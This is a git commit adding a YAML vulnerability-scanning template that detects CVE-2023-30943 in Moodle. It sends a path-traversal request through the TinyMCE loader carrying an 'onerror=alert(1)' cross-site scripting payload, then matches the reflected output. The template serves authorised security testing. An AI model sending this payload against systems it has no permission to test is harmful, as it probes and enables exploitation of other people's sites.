Create CVE-2023-30943.yaml

patch-1
Ritik Chaddha 2023-08-31 10:04:29 +05:30 committed by GitHub
parent 51731aba50
commit 83bb3b4766
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 45 additions and 0 deletions

View File

@ -0,0 +1,45 @@
id: CVE-2023-30943
info:
name: Moodle - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
The vulnerability was found Moodle which exists because the application allows a user to control path of the older to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system.
reference:
- https://www.sonarsource.com/blog/playing-dominos-with-moodles-security-1/?utm_source=twitter&utm_medium=social&utm_campaign=wordpress&utm_content=security&utm_term=mofu
- https://nvd.nist.gov/vuln/detail/CVE-2023-30943
metadata:
max-request: 2
tags: cve,cve2023,moodle,xss
http:
- raw:
- |
GET /lib/editor/tiny/loader.php?rev=a/../../../../html/pix/f/<input><img%20src=x%20onerror=alert(1)>.png HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- |
GET /admin/tool/filetypes/edit.php?name=add HTTP/1.1
Host: {{Hostname}}
host-redirects: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src=x onerror=alert(1)>"
- "moodle"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200